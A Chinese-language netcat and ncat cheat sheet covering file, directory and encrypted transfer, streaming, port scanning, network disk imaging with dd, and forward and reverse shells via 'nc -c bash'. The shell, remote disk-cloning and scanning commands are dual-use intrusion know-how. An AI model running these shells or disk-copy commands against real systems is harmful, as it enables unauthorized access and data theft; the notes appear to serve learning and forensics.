Netcat

nc 作为客户端：经常使用的参数 nc -vn (v:显示详细的连接信息，n:不进行 DNS 域名解析 ，q：退出)
先通过 ping pop3.163.com 获得相应的 IP 地址:220.181.12.110,连接他的 110 端口
执行 nc -vn 220.181.12.110 110，服务器返回
(UNKNOWN) [220.181.12.110] 110 (pop3) open
+OK Welcome to coremail Mail Pop3 Server (163coms[b62aaa251425b4be4eaec4ab4744cf47s])
接下来输入经过 base64 编码的邮箱账户和密码来进行登录,收发邮件
例如 USER xxxx password xxx
传输文本协议 需要其中一台服务器监听一个端口
命令：nc -l -p 4444 l:listen p: port
另一台客户端连接到该服务器 nc -vn ip 4444
用于远程电子取证
传输文件
A：nc -lp port >1.mp4
B：nc -vn ip port < 1.mp4 -q 1
(服务端 A 端监听端口，等待接收文件；客户端 B 连接 A 将文件传输到该端口，完成 1 秒后断开连接)
或者
A：nc -q 1 -lp 333 <a.mp4
B：nc -vn ip port > 2.mp4
(A 监听端口，作为输入端；将文件输入该端口，当客户端 B 连接时，文件传输，完成 1 秒后断开连接)
传输目录
A：tar -cvf - muisic/ | nc -lp port -q 1
B：nc -vn ip port | tar -xvf -
(服务端 A 通过 tar 命令将目录打包成文件通过管道命令将文件输入到指定端口，客户端 B 连接端口通过管道进行 tar 解压)
传输加密文件
A：nc -lp port | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B：mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -vn ip port -q 1 {输入密钥}
(加密算法 rijndael-256 密钥 加密过程参数 Fbq 解密过程参数 Fbqd)
系统中 mcrypt 命令进行加密 安装：apt-get install mcrypt
流媒体服务器
A：cat 1.mp4 | nc -lp port
B：nc -vn ip port | mplayer -vo x11 -cache 3000 -
(mplayer 为媒体播放器)
端口扫描
NETCAT 默认使用 TCP 协议探测 所以端口为 1~65535
nc -vnz ip 1-65535 (参数z：zero I/O mode [used for scanning] 扫描)
nc -vnzu ip 1-1024（参数u：udp协议）
远程克隆硬盘
A：nc -lp port | dd of=/dev/sda (of：output file)
B：dd if=/dev/sda | nc -vn ip port -q 1 (if：input file)
(远程电子取证，可以将目标服务器硬盘远程复制，或者内容；块级别)
远程控制
正向：
A：nc -lp port -c bash
B：nc ip port
反向：
A：nc -lp port
B：nc ip port -c bash
注：Windows 用户把 bash 改成 cmd；
NCAT
NC 缺乏加密和身份验证的能力
Ncat 包含于 nmap 工具包中
A：ncat -c bash --allow ip -vnl port --ssl (allow 参数允许某个 IP 地址连接 ssl 做加密)
B：ncat -vn ip port --ssl
不同平台/系统的 nc 参数功能不尽相同